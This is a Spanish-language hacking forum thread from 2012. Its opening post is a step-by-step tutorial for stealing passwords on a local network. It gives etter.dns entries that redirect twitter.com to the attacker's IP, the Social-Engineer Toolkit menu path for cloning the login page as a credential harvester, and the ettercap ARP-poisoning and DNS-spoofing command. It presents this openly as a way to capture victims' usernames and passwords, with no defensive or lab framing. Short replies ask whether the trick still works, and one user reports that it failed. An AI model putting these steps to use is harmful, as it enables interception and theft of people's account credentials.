comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Olfateando Passwords con Ettercap

  • 3 Respuestas
  • 4102 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado REC

  • *
  • Underc0der
  • Mensajes: 122
  • Actividad:
    0%
  • Reputación 0
  • o.O!
    • Ver Perfil
    • Email
« en: Mayo 25, 2012, 03:04:58 pm »

Olfateando Passwords con Ettercap por Intruder-T23

Introducción:
Este tipo de ataque consiste en envenenar el DNS de una red LAN. Cuando alguien de la intranet entra en algún website (en su navegador la víctima coloca la página web exactamente como es, por ejemplo, este coloca "No tienes permisos para ver links. Registrate o Entra con tu cuenta") e introduce su nombre de usuario y password, esta información llega a la computadora del atacante, quien se encuentra olfateando la red.

Datos Basicos:
Distro: Backtrack 5
Herramientas: Ettercap y SET (Social-Engineer Toolkit).
Tipo de Ataque: Olfateo y Envenenamiento de DNS (DNS Poisoning).
Resultados Obtenidos: Nombre de usuario y password.

Configurando etter:
En la terminal, se teclean los siguientes comandos:

Citar
A. ifconfig
B. locate etter.dns
C. nano /usr/local/share/ettercap/etter.dns


Descripción de comandos:
A. Se teclea "ifconfig" para ver la dirección IP local de la computadora atacante, la cual es 192.168.1.104. También se ve la interfaz de la tarjeta wireless, la cual es wlan0.
B. Se teclea "locate etter.dns" para localizar el directorio del archivo etter.dns.
C. Se usa el comando "nano" mas el directorio del archivo etter.dns para así poder editarlo.

Archivo Etter.dns:
Aquí se añaden las siguientes líneas:
Citar
twitter.com       A 192.168.1.104
*.twitter.com     A 192.168.1.104
No tienes permisos para ver links. Registrate o Entra con tu cuenta   A 192.168.1.104
 

Twitter.com es el website donde la víctima introducirá su nombre de usuario y password. Como pueden ver, también hay que introducir la dirección IP de la PC atacante. Una vez que se llenan los datos, para guardar los cambios se debe teclear lo siguiente: "control+x" (Ctrl más la tecla x), luego se teclea "y", y finalmente "enter".

Social-Engineer Toolkit (SET):

Después de realizar los cambios en el archivo etter.dns, se teclea el símbolo del dragón para ir a: Backtrack>>Explotation Tools>>Social Engineering Tools>>set

Dentro de SET, se teclea:
1) Social Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Dentro de SET, se coloca el website y queda de la siguiente forma:

Citar
Enter the url to clone: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Y se teclea la tecla enter para dejar el website falso corriendo en el puerto 80...

Ettercap:
En la consola, se teclea:

Citar
ettercap -T -q -l wlan0 -P dns_spoof -M arp // //

Finalmente, cuando la víctima entra a la página web e introduce su nombre de usuario y password, la información llega a la computadora del atacante. En el video, el nombre de usuario es "internaut" y el password es "password123".

Descarga del Video Tutorial de buena calidad:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Mala calidad :(








Fuente : No tienes permisos para ver links. Registrate o Entra con tu cuenta


sa sa sa ludos  ;D
« Última modificación: Agosto 08, 2014, 09:18:59 pm por Expermicid »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« Respuesta #1 en: Mayo 26, 2012, 02:23:41 pm »
aun sirve el dns spoof?
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

Desconectado REC

  • *
  • Underc0der
  • Mensajes: 122
  • Actividad:
    0%
  • Reputación 0
  • o.O!
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 26, 2012, 05:47:46 pm »
Citar
aun sirve el dns spoof?

Hola, pues el vídeo fue lanzado resien el 15/05/2012  con el post .  (aunque bro seria divertido si lo intentases y nos cuentes como te fue )  salu2
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • root@xc0d3[#] ~Done
    • Ver Perfil
    • Email
« Respuesta #3 en: Mayo 27, 2012, 12:28:35 pm »
m claro lo intente pero no funciona no pasa nada en el ethercap me sale que esta redirecionando pero entreo al navegador y no pasa nada xD"
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

 

¿Te gustó el post? COMPARTILO!



MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet

Respuestas: 8
Vistas: 5868
Último mensaje Abril 05, 2017, 01:37:02 am
por puntoCL
Intercepter-NG una herramienta completisima de Sniffer y bruteforcing Passwords

Iniciado por Rootkit_Pentester

Respuestas: 12
Vistas: 3449
Último mensaje Octubre 22, 2018, 08:24:24 pm
por Rootkit_Pentester
Captura de imagenes en una LAN con ettercap y Drifnet

Iniciado por k43l

Respuestas: 3
Vistas: 4432
Último mensaje Noviembre 18, 2012, 02:00:42 pm
por ssw_1
Tutorial Ettercap + etterfilter by k43l

Iniciado por Stiuvert

Respuestas: 0
Vistas: 1856
Último mensaje Marzo 30, 2012, 07:38:30 am
por Stiuvert
Tutorial Ettercap + etterfilter by k43l

Iniciado por k43l

Respuestas: 4
Vistas: 3149
Último mensaje Octubre 28, 2011, 02:31:40 pm
por Shama|TwoH